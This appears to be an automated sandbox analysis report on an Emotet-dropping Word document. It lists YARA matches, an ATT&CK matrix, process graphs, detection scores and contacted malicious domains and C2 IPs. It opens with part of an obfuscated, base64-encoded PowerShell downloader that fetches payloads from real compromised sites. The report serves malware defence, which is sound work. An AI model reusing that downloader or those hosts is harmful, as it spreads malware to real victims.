sAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAACJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 BlobJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000011.00000002.2222429242.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2338162997.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2336996681.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2189259516.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2148553869.0000000000710000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2127750584.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2180397123.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2197905867.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2168489304.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2188156936.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2336963149.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2198949244.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2210754308.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2133960367.0000000000170000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2208025145.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2124233296.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2134645958.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2157336224.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2113528268.0000000000270000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2113590423.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2134026009.0000000000260000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2177327005.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2148272205.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2197927518.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2157365734.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2124067211.0000000000140000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2208036737.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2217818929.0000000000220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2159945715.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2170332868.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2177340948.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2217846238.0000000000240000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2149995465.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.2188168029.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2168457347.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.2c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.260000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.240000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.290000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.710000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.290000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.6a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.710000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.220000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.6a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.240000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.2c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.220000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.1b0000.0.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Disable or Modify Tools111OS Credential DumpingFile and Directory Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer4Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScripting22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information3LSASS MemorySystem Information Discovery15Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsExploitation for Client Execution3Logon Script (Windows)Logon Script (Windows)Scripting22Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsCommand and Scripting Interpreter211Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSecurity Software Discovery11Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsPowerShell3Network Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsVirtualization/Sandbox Evasion2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol14Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading21Cached Domain CredentialsProcess Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion2DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection111Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Rundll321Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 344894 Sample: ARCHIVOFile-20-012021.doc Startdate: 27/01/2021 Architecture: WINDOWS Score: 100 52 1.226.84.243:8080 unknown unknown 2->52 54 104.131.41.185:8080 unknown unknown 2->54 56 90 other IPs or domains 2->56 68 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->68 70 Multi AV Scanner detection for domain / URL 2->70 72 Found malware configuration 2->72 74 17 other signatures 2->74 15 cmd.exe 2->15         started        18 WINWORD.EXE 293 28 2->18         started        signatures3 process4 signatures5 86 Suspicious powershell command line found 15->86 88 Very long command line found 15->88 90 Encrypted powershell cmdline option found 15->90 20 powershell.exe 16 13 15->20         started        25 msg.exe 15->25         started        process6 dnsIp7 58 mrveggy.com 177.12.170.95, 443, 49167 IPV6InternetLtdaBR Brazil 20->58 60 riandutra.com 191.6.196.95, 49165, 80 IPV6InternetLtdaBR Brazil 20->60 62 4 other IPs or domains 20->62 50 C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll, PE32 20->50 dropped 78 Powershell drops PE file 20->78 27 rundll32.exe 20->27         started        29 rundll32.exe 25->29         started        file8 signatures9 process10 dnsIp11 33 rundll32.exe 27->33         started        64 84.232.229.24, 49175, 80 RCS-RDS73-75DrStaicoviciRO Romania 29->64 66 51.255.203.164, 8080 OVHFR France 29->66 84 System process connects to network (likely due to code injection or exploit) 29->84 signatures12 process13 process14 35 rundll32.exe 2 33->35         started        signatures15 76 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->76 38 rundll32.exe 35->38         started        process16 process17 40 rundll32.exe 1 38->40         started        signatures18 80 Hides that the sample has been downloaded from the Internet (zone.identifier) 40->80 43 rundll32.exe 40->43         started        process19 process20 45 rundll32.exe 1 43->45         started        signatures21 82 Hides that the sample has been downloaded from the Internet (zone.identifier) 45->82 48 rundll32.exe 45->48         started        process22

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      ARCHIVOFile-20-012021.doc48%VirustotalBrowse
                      ARCHIVOFile-20-012021.doc50%ReversingLabsDocument-Office.Trojan.GenScript

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll100%Joe Sandbox ML
                      C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll46%MetadefenderBrowse
                      C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll86%ReversingLabsWin32.Trojan.EmotetCrypt

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      16.2.rundll32.exe.1d0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      13.2.rundll32.exe.200000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      13.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      16.2.rundll32.exe.1b0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      11.2.rundll32.exe.2c0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      17.2.rundll32.exe.240000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.710000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.6a0000.0.unpack100%AviraTR/ATRAPS.GenDownload File
                      18.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.270000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      11.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      18.2.rundll32.exe.290000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.220000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.260000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      14.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      17.2.rundll32.exe.220000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      14.2.rundll32.exe.200000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      16.2.rundll32.exe.10000000.3.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.1f0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.200000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      17.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      15.2.rundll32.exe.200000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.290000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      14.2.rundll32.exe.1e0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      15.2.rundll32.exe.10000000.2.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      hbprivileged.com7%VirustotalBrowse
                      mrveggy.com5%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      https://norailya.com/drupal/retAl/100%Avira URL Cloudmalware
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://crl.use0%Avira URL Cloudsafe
                      https://ummahstars.com0%Avira URL Cloudsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      https://hbprivileged.comh0%Avira URL Cloudsafe
                      https://hbprivileged.com0%Avira URL Cloudsafe
                      https://norailya.com0%Avira URL Cloudsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      https://mrveggy.com/wp-admin/n/0%Avira URL Cloudsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      http://r3.o.lencr.org00%URL Reputationsafe
                      http://r3.o.lencr.org00%URL Reputationsafe
                      http://r3.o.lencr.org00%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      https://www.teelekded.com/cgi-bin/LPo/100%Avira URL Cloudmalware
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      http://servername/isapibackend.dll0%Avira URL Cloudsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                      http://r3.i.lencr.org/0%0%Avira URL Cloudsafe
                      http://riandutra.com/email/AfhE8z0/0%Avira URL Cloudsafe
                      http://calledtochange.org/CalledtoChange/8huSOd/100%Avira URL Cloudmalware
                      https://ummahstars.com/app_old_may_2018/assets/wDL8x/100%Avira URL Cloudmalware
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      http://riandutra.com0%Avira URL Cloudsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      https://mrveggy.com0%Avira URL Cloudsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      https://hbprivileged.com/cgi-bin/Qg/100%Avira URL Cloudmalware
                      http://r3.o.lencr.o0%Avira URL Cloudsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      https://www.teelekded.com/cgi-bin/LPo/P100%Avira URL Cloudmalware
                      http://calledtochange.org0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      hbprivileged.com
                      		35.209.96.32
                      		truetrueunknown
                      mrveggy.com
                      		177.12.170.95
                      		truetrueunknown
                      ummahstars.com
                      		35.163.191.195
                      		truetrue
                        		unknown
                        riandutra.com
                        		191.6.196.95
                        		truetrue
                          		unknown
                          calledtochange.org
                          		75.103.81.81
                          		truetrue
                            		unknown
                            norailya.com
                            		104.168.154.203
                            		truetrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://riandutra.com/email/AfhE8z0/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://calledtochange.org/CalledtoChange/8huSOd/true
                              • Avira URL Cloud: malware
                              		unknown

                              URLs from Memory and Binaries

